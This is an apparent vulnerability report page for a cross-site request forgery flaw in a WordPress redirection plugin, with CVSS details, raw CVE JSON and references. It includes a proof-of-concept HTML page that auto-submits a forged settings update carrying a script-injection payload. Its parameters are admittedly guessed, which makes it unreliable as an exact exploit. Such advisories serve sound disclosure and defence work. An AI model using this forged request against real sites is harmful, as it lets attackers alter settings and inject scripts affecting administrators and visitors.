Security Vulnerability Report
中文
CVE-2026-7561 CVSS 6.1 MEDIUM

CVE-2026-7561

Published: 2026-05-12 09:16:57
Last Modified: 2026-05-12 14:03:53

Description

The Tm – WordPress Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tm – WordPress Redirection <= 1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-7561: CSRF in Tm - WordPress Redirection This PoC demonstrates how an attacker could trick an admin into updating settings. --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://target-site.com/wp-admin/admin.php?page=tm-redirection-settings" method="POST"> <!-- Parameters inferred from typical plugin structure, actual params may vary based on plugin code --> <input type="hidden" name="option_name" value="malicious_payload" /> <input type="hidden" name="action" value="update" /> <input type="hidden" name="tm_redirect_setting" value="<script>alert('XSS');</script>" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7561", "sourceIdentifier": "[email protected]", "published": "2026-05-12T09:16:57.310", "lastModified": "2026-05-12T14:03:52.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tm – WordPress Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/tm-wordpress-redirection/tags/1.2/tm-redirect.php#L168", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tm-wordpress-redirection/tags/1.2/tm-redirect.php#L265", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tm-wordpress-redirection/tags/1.2/tm-redirect.php#L308", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tm-wordpress-redirection/trunk/tm-redirect.php#L168", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tm-wordpress-redirection/trunk/tm-redirect.php#L265", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tm-wordpress-redirection/trunk/tm-redirect.php#L308", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/82caf69a-2423-4f0f-9cf2-7d4fe428e915?source=cve", "source": "[email protected]"}]}}